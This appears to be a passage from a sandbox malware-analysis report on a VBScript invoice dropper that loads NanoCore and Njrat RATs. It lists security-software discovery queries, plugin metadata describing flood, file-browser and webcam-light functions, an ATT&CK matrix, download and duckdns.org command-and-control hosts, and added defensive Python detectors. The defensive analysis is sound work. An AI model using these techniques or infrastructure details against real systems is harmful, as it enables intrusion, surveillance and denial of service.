      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
(Each of the three SecurityCenter2 queries was issued ten times during the run, 30 ExecQuery calls in all; the identical repeated lines are collapsed here.)
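The WMI lines above are the classic security-software-discovery pattern: a process that has no business reading ROOT\SecurityCenter2 (a .NET build tool, here hollowed by the injected RAT) polls all three product classes over and over. The following is an added example, not Joe Sandbox code or the report's own logic: it turns that pattern into a detection that runs over sandbox-style event lines. SAMPLE_LOG is constructed to mirror the "Source: <process> WMI Queries: ..." lines of this report, and ALLOWLIST is a hypothetical starting set of images that legitimately read SecurityCenter2; both must be tuned to the environment.

```python
"""Flag processes that enumerate installed security products through WMI
ROOT\\SecurityCenter2. Added example; not part of the Joe Sandbox report."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath
from typing import Dict, Iterable, Iterator, Tuple

# Classes under ROOT\SecurityCenter2 that list installed security software.
SECURITYCENTER2_CLASSES = {"AntiVirusProduct", "AntiSpywareProduct", "FirewallProduct"}

# Assumption (hypothetical allowlist): image names that legitimately read SecurityCenter2.
ALLOWLIST = {"securityhealthservice.exe", "securityhealthsystray.exe", "mmc.exe"}

# Matches the report's line shape; tolerates the fused "...exeWMI Queries" form as well.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>[A-Za-z]:\\\S+?\.exe)\s*WMI Queries:\s*"
    r"IWbemServices::ExecQuery\s*-\s*(?P<ns>ROOT\\[\w\\]+)\s*:\s*"
    r"SELECT\s+(?P<cols>[\w,*\s]+?)\s+FROM\s+(?P<cls>\w+)",
    re.IGNORECASE,
)


def parse_wmi_events(lines: Iterable[str]) -> Iterator[Tuple[str, str, str]]:
    """Yield (process_path, namespace, class) for every ExecQuery line."""
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            yield m.group("proc"), m.group("ns").upper(), m.group("cls")


def security_software_discovery(lines: Iterable[str]) -> Dict[str, dict]:
    """Return {process_path: {"classes": set, "queries": int}} for every
    non-allowlisted process that queried a SecurityCenter2 product class."""
    hits: Dict[str, dict] = defaultdict(lambda: {"classes": set(), "queries": 0})
    for proc, ns, cls in parse_wmi_events(lines):
        if ns != "ROOT\\SECURITYCENTER2" or cls not in SECURITYCENTER2_CLASSES:
            continue
        if PureWindowsPath(proc).name.lower() in ALLOWLIST:
            continue
        hits[proc]["classes"].add(cls)
        hits[proc]["queries"] += 1
    return dict(hits)


def severity(hit: dict) -> str:
    """Full enumeration (all three classes) plus repeated polling, as in the
    report, scores high; either alone scores medium; a single query scores low."""
    full = hit["classes"] == SECURITYCENTER2_CLASSES
    repeated = hit["queries"] > len(hit["classes"])
    if full and repeated:
        return "high"
    if full or repeated:
        return "medium"
    return "low"


# Constructed sample log, shaped like the report's lines (not sandbox output).
SUSPECT = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
_Q = "WMI Queries: IWbemServices::ExecQuery - ROOT\\SecurityCenter2 : SELECT DisplayName FROM "
SAMPLE_LOG = [
    f"Source: {SUSPECT} {_Q}AntiVirusProduct",
    f"Source: {SUSPECT} {_Q}FirewallProduct",
    f"Source: {SUSPECT} {_Q}AntiSpywareProduct",
    f"Source: {SUSPECT} {_Q}AntiVirusProduct",          # polled again, as the report shows
    # noise: a query to a different namespace, and an allowlisted SecurityCenter2 reader
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: "
    r"IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_OperatingSystem",
    f"Source: C:\\Windows\\System32\\SecurityHealthService.exe {_Q}AntiVirusProduct",
]

if __name__ == "__main__":
    for proc, hit in security_software_discovery(SAMPLE_LOG).items():
        print(f"{severity(hit):6} {proc}  classes={sorted(hit['classes'])} queries={hit['queries']}")
```

The namespace check matters: CIMV2 queries for OS or hardware details are everyday noise, whereas SecurityCenter2 has exactly one purpose, and a non-security binary asking it three different questions in a loop is about as clean a discovery signal as WMI gives.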

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match | File source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR

Yara detected Njrat
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat
The five long strings below are the .NET metadata name tables of NanoCore plugin assemblies found in the aspnet_compiler.exe instance dumped as 00000014 (the 20.2.* unpacks listed above): NanoCoreStressTester (HTTP/SlowLoris/SYN/TCP/UDP flood commands), FileBrowserClient, ClientPlugin.dll, NanoCoreBase.dll and MyClientPlugin.dll. All of them reference the NanoCore.ClientPluginHost and NanoCore.ClientPlugin interfaces, which ties the payload to the NanoCore client framework.
Source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: aspnet_compiler.exe, 00000014.00000002.1178170237.0000000003C41000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: aspnet_compiler.exe, 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights

Yara detected Nanocore RAT
Source: Yara match | File source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR

Yara detected Njrat
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR

Mitre Att&ck Matrix

(One row per column position of the report's matrix; a number in parentheses after a technique is the signature-count badge the report attaches to it. Empty cells are left blank.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (1) | Registry Run Keys / Startup Folder (1) | Process Injection (212) | Disable or Modify Tools (1) | Input Capture (11) | File and Directory Discovery (2) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Encrypted Channel (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting (221) | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder (1) | Deobfuscate/Decode Files or Information (11) | LSASS Memory | System Information Discovery (12) | Remote Desktop Protocol | Input Capture (11) | Exfiltration Over Bluetooth | Non-Standard Port (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API (1) | Logon Script (Windows) | Logon Script (Windows) | Scripting (221) | Security Account Manager | Query Registry (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Remote Access Software (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter (11) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (1) | NTDS | Security Software Discovery (11) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (1) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell (1) | Network Logon Script | Network Logon Script | Software Packing (11) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (22) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (21) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion (21) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection (212) | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Behavior Graph

Behavior Graph ID: 458883 | Sample: 3G1J49A6V_Invoice.vbs | Start date: 03/08/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

Process tree as drawn in the graph (numbers in brackets are the graph's badge counts on that node):

wscript.exe [1]
    signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Obfuscated command line found
    +-- powershell.exe [14 30]
            network: ia601405.us.archive.org 207.241.227.125, 443, 49746 INTERNET-ARCHIVEUS United States; ia801408.us.archive.org 207.241.228.148, 443, 49756 INTERNET-ARCHIVEUS United States
            dropped: PowerShell_transcr....20210803203913.txt, UTF-8
            signatures: Creates an undocumented autostart registry key; Writes to foreign memory regions; Injects a PE file into a foreign processes
            +-- aspnet_compiler.exe
                    network: newjan.duckdns.org 185.244.30.23, 49776, 49777, 49778 DAVID_CRAIGGG Netherlands
                    dropped: C:\Users\user\AppData\Roaming\...\run.dat, data
                    signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
            +-- aspnet_compiler.exe
                    network: dangomra.duckdns.org
            +-- conhost.exe
            +-- 2 other processes
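The chain the graph draws (script host, then PowerShell that downloads from archive.org and injects, then a .NET framework binary that beacons to dynamic DNS) is worth encoding as a lineage rule rather than as three separate signatures. The following is an added example, not Joe Sandbox code: it rebuilds the process tree from constructed events and flags exactly that lineage. Image names, domains and IPs are the report's; the PIDs are placeholders (the graph gives none), the pairing of each aspnet_compiler.exe instance with its domain follows the graph's two network edges, and the extra script hosts, shells, .NET host binaries and dynamic-DNS suffixes beyond wscript.exe, powershell.exe, aspnet_compiler.exe and duckdns.org are an assumed extension to tune per environment.

```python
"""Process-lineage detection for 'script host -> shell -> injected .NET host
binary beaconing to dynamic DNS'. Added example; not Joe Sandbox code."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    image: str                                   # image basename, e.g. "powershell.exe"
    parent: Optional[int] = None                 # PID of the creating process
    connections: List[Tuple[str, str, Optional[int]]] = field(default_factory=list)  # (domain, ip, dst_port)
    dropped: List[str] = field(default_factory=list)


# Assumption: sets extended beyond what the report shows (wscript.exe, powershell.exe,
# aspnet_compiler.exe, duckdns.org); adjust to the environment.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOTNET_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net")


def lineage(procs: Dict[int, Proc], pid: int) -> List[str]:
    """Image names from the root of the tree down to `pid` (cycle-safe)."""
    chain, seen = [], set()
    cur = procs.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image.lower())
        cur = procs.get(cur.parent) if cur.parent is not None else None
    return list(reversed(chain))


def is_dyndns(domain: str) -> bool:
    return domain.lower().endswith(DYNDNS_SUFFIXES)


def find_injected_beacons(procs: Dict[int, Proc]):
    """(pid, 'root -> ... -> leaf', [dyn-DNS connections]) for every .NET host
    binary that descends from a script host through a shell and talks to dynamic DNS."""
    findings = []
    for p in procs.values():
        if p.image.lower() not in DOTNET_HOSTS:
            continue
        chain = lineage(procs, p.pid)
        names = set(chain)
        if not (names & SCRIPT_HOSTS and names & SHELLS):
            continue
        dyn = [c for c in p.connections if is_dyndns(c[0])]
        if dyn:
            findings.append((p.pid, " -> ".join(chain), dyn))
    return findings


def stager_downloads(procs: Dict[int, Proc]):
    """Shell processes that made TLS connections and dropped a file: the download stage."""
    return [(p.pid, [c[0] for c in p.connections], p.dropped)
            for p in procs.values()
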